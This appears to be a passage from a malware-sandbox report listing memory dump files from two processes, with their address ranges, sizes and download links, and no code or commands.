memory/3708-18-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

Filesize
120KB

Download
memory/3708-65-0x0000000006270000-0x0000000006278000-memory.dmp

Filesize
32KB

Download
memory/3708-71-0x000000007190E000-0x000000007190F000-memory.dmp

Filesize
4KB

Download
memory/3708-72-0x0000000071900000-0x00000000720B0000-memory.dmp

Filesize
7.7MB

Download
memory/3708-73-0x0000000007090000-0x00000000070B2000-memory.dmp

Filesize
136KB

Download
memory/3708-74-0x0000000008150000-0x00000000086F4000-memory.dmp

Filesize
5.6MB

Download
memory/3708-16-0x00000000057E0000-0x0000000005846000-memory.dmp

Filesize
408KB

Download
memory/3708-10-0x0000000005540000-0x0000000005562000-memory.dmp

Filesize
136KB

Download
memory/3708-4-0x0000000071900000-0x00000000720B0000-memory.dmp

Filesize
7.7MB

Download
memory/3708-17-0x00000000058A0000-0x0000000005BF4000-memory.dmp

Filesize
3.3MB

Download
memory/3708-19-0x0000000005D10000-0x0000000005D5C000-memory.dmp

Filesize
304KB

Download
memory/3708-0-0x000000007190E000-0x000000007190F000-memory.dmp

Filesize
4KB

Download
memory/3708-1-0x0000000004730000-0x0000000004766000-memory.dmp

Filesize
216KB

Download
memory/3708-2-0x0000000004DA0000-0x00000000053C8000-memory.dmp

Filesize
6.2MB

Download
memory/3708-3-0x0000000071900000-0x00000000720B0000-memory.dmp

Filesize
7.7MB

Download
memory/4040-104-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4040-128-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4040-103-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4040-136-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download